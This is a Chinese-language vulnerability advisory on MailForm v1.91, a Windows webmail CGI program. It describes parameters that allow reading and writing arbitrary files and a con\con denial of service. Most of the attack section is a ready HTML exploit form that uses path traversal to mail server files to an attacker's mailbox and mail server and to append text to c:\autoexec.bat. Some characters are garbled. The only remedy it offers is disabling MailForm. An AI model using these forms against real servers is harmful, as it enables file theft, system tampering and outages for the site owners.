MailForm 1.91的系列漏洞

婕俺绦颍?
MailForm v1.91 For Windows9x&NT

描述
Mailform V1.91有一些参数允许恶意用户利用而入侵系统

详细
MailForm是一个常用的webmail程序，国内一些ICP也有采用。
这个程序的系列参数允许入侵者危及系统，危害：DOS、读写硬盘文件、上传文件、甚至完全控制整个系统

有问题的参数：
_1_TextLog - 允许写文件
_1_HTMLLog - 允许写文件
_1_MailTemplate - 允许获取文件
_1_INIFile - 可能危险
_1_MailServer - 可以将这个值设置为攻击者的地址
_1_MailTo - 发送邮件


Its fairly obvious where the problem lies here. We can specify any
file to send + the POP server to send it to. The con\con bug may also
be used to bring down the entire system. Template files will be cut
off at the first null character, so retrieving of binaries is not
practical. Trying to retrieve certain files will cause MailForm to
crash.
1、攻击者可以通过发送邮件的方式，把系统上的任何文件发送到自己的邮箱；
2、可以使用windows9x的虚拟设备解析漏洞导致系统当机


下面是构造好的 html(可以在任何一台在线的 web 服务器上构造这种html文件)，允许攻击者下载任何文件：
---------------------------------------------------cut here-----------------------------------
$#@60;html$#@62;
$#@60;title$#@62;Web interface for MailForm vulnerabilities.$#@60;/title$#@62;
$#@60;/head$#@62;
如果发现 "Form submission failed" 的提示，不要担心，这是正常的。在下面，有些参数必须修改，这取决于你要攻击的主机。
$#@60;br$#@62;
$#@60;br$#@62;
Download file:$#@60;br$#@62;
$#@60;body bgcolor="#FFFFFF"$#@62;

$#@60;form method="POST" action="http://www.xxx.com/cgi-bin/mailform.exe"$#@62;
$#@60;input type="text" name="_1_MailServer" value="yourhost"$#@62;$#@60;br$#@62;
$#@60;input type="text" name="_1_MailTemplate" value="..\xitami.aut"$#@62;$#@60;br$#@62;
$#@60;input type="hidden" size="30" name="_1_MailTo" value="me@isp.com"$#@62;
$#@60 put type="hidden" size="40" name="Name" value="me"$#@62;
$#@60;input type="submit" value="Send" name="_2_Submit"$#@62;
$#@60;/form$#@62;
$#@60;br$#@62;
Append to file:$#@60;br$#@62;
Note: your text will be preceeded by garbage.$#@60;br$#@62;
$#@60;body bgcolor="#FFFFFF"$#@62;
$#@60;form method="POST" action="http://www.xxx.com/cgi-bin/mailform.exe"$#@62;
$#@60;input type="hidden" name="_1_MailServer" value="x"$#@62;
$#@60;input type="hidden" name="_1_MailTemplate" value="nul"$#@62;
$#@60;input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"$#@62;$#@60;br$#@62;
$#@60;input type="hidden" size="30" name="_1_MailTo" value="me@isp.com "$#@62;
$#@60;textarea name="Name" rows="4" cols="40"$#@62;$#@60;/textarea$#@62;
$#@60;br$#@62;$#@60;input type="submit" value="Send" name="_2_Submit"$#@62;
$#@60;/form$#@62;
$#@60;/body$#@62;
$#@60;/html$#@62;
---------------------------------------------------cut here-------------------------
这将把 c:\autoexec.bat 发送到 me@isp.com

这只是通过form发送邮件而读取硬盘文件的一个示范，更多的功能如上载文件、执行指令，也可以做到，在这里暂时不公布具体方法。

解决方案
禁用 MailForm